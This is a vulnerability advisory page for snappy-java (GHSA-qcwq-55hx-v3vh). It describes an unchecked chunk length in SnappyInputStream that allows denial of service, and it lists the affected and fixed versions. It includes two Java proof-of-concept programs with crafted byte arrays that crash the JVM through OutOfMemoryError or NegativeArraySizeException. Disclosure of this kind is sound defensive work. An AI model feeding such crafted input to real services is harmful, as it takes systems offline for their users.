GHSA-qcwq-55hx-v3vh

Suggest an improvement
Source
https://github.com/advisories/GHSA-qcwq-55hx-v3vh
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-qcwq-55hx-v3vh/GHSA-qcwq-55hx-v3vh.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qcwq-55hx-v3vh
Aliases
Related
Published
2023-06-15T17:15:06Z
Modified
2024-02-17T05:36:43.827976Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
snappy-java's unchecked chunk length leads to DoS
Details

Summary

Due to use of an unchecked chunk length, an unrecoverable fatal error can occur.

Impact

Denial of Service

Description

The code in the function hasNextChunk in the file SnappyInputStream.java checks if a given stream has more chunks to read. It does that by attempting to read 4 bytes. If it wasn’t possible to read the 4 bytes, the function returns false. Otherwise, if 4 bytes were available, the code treats them as the length of the next chunk.

        int readBytes = readNext(header, 0, 4);
        if (readBytes < 4) {
            return false;
        }

        int chunkSize = SnappyOutputStream.readInt(header, 0);
        if (chunkSize == SnappyCodec.MAGIC_HEADER_HEAD) {
            .........
        }

        // extend the compressed data buffer size
        if (compressed == null || chunkSize > compressed.length) {
            compressed = new byte[chunkSize];
        }

In the case that the “compressed” variable is null, a byte array is allocated with the size given by the input data. Since the code doesn’t test the legality of the “chunkSize” variable, it is possible to pass a negative number (such as 0xFFFFFFFF which is -1), which will cause the code to raise a “java.lang.NegativeArraySizeException” exception. A worse case would happen when passing a huge positive value (such as 0x7FFFFFFF), which would raise the fatal “java.lang.OutOfMemoryError” error.

Steps To Reproduce

Compile and run the following code:

package org.example;
import org.xerial.snappy.SnappyInputStream;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0x7f, (byte) 0xff, (byte) 0xff, (byte) 0xff};
        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
        byte[] out = new byte[50];
        try {
            in.read(out);
        }
        catch (Exception ignored) {

        }
    }
}

The program will crash with the following error (or similar), even though there is a catch clause, since “OutOfMemoryError” does not get caught by catching the “Exception” class:

Exception in thread "main" java.lang.OutOfMemoryError: Requested array size exceeds VM limit
    at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)
    at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)
    at java.base/java.io.InputStream.read(InputStream.java:217)
    at org.example.Main.main(Main.java:12)

Alternatively - compile and run the following code:

package org.example;
import org.xerial.snappy.SnappyInputStream;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        byte[] data = {-126, 'S', 'N', 'A', 'P', 'P', 'Y', 0, 0, 0, 0, 0, 0, 0, 0, 0,(byte) 0xff, (byte) 0xff, (byte) 0xff, (byte) 0xff};
        SnappyInputStream in = new SnappyInputStream(new ByteArrayInputStream(data));
        byte[] out = new byte[50];
        in.read(out);
    }
}

The program will crash with the following error (or similar):

Exception in thread "main" java.lang.NegativeArraySizeException: -1
    at org.xerial.snappy.SnappyInputStream.hasNextChunk(SnappyInputStream.java:422)
    at org.xerial.snappy.SnappyInputStream.read(SnappyInputStream.java:167)
    at java.base/java.io.InputStream.read(InputStream.java:217)
    at org.example.Main.main(Main.java:12)

It is important to note that these examples were written by using a flow that is generally used by developers, and can be seen for example in the Apache project “flume”: https://github.com/apache/flume/blob/f9dbb2de255d59e35e3668a5c6c66a268a055207/flume-ng-channels/flume-file-channel/src/main/java/org/apache/flume/channel/file/Serialization.java#L278. Since they used try-catch, the “NegativeArraySizeException” exception won’t harm their users, but the “OutOfMemoryError” error can.

Database specific
{
    "nvd_published_at": "2023-06-15T18:15:09Z",
    "cwe_ids": [
        "CWE-770"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-15T17:15:06Z"
}
References

Affected packages

Maven / org.xerial.snappy:snappy-java

Package

Name
org.xerial.snappy:snappy-java
View open source insights on deps.dev
Purl
pkg:maven/org.xerial.snappy/snappy-java

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.1.10.1

Affected versions

1.*

1.0.1-rc1
1.0.1-rc2
1.0.1-rc3
1.0.1-rc4
1.0.3-rc1
1.0.3-rc2
1.0.3-rc3
1.0.3-rc4
1.0.3
1.0.3.1
1.0.3.2
1.0.3.3
1.0.4
1.0.4.1
1.0.5-M1
1.0.5-M2
1.0.5-M3
1.0.5-M4
1.0.5
1.0.5.1
1.0.5.2
1.0.5.3
1.0.5.4
1.1.0-M1
1.1.0-M2
1.1.0-M3
1.1.0-M4
1.1.0
1.1.0.1
1.1.1-M1
1.1.1-M2
1.1.1-M3
1.1.1-M4
1.1.1
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
1.1.1.5
1.1.1.6
1.1.1.7
1.1.2-M1
1.1.2-RC1
1.1.2-RC2
1.1.2-RC3
1.1.2
1.1.2.1
1.1.2.2
1.1.2.3
1.1.2.4
1.1.2.5
1.1.2.6
1.1.3-M1
1.1.3-M2
1.1.4-M1
1.1.4-M2
1.1.4-M3
1.1.4
1.1.7
1.1.7.1
1.1.7.2
1.1.7.3
1.1.7.4
1.1.7.5
1.1.7.6
1.1.7.7
1.1.7.8
1.1.8
1.1.8.1
1.1.8.2
1.1.8.3
1.1.8.4
1.1.9.0
1.1.9.1
1.1.10.0

Database specific

{
    "last_known_affected_version_range": "<= 1.1.10.0"
}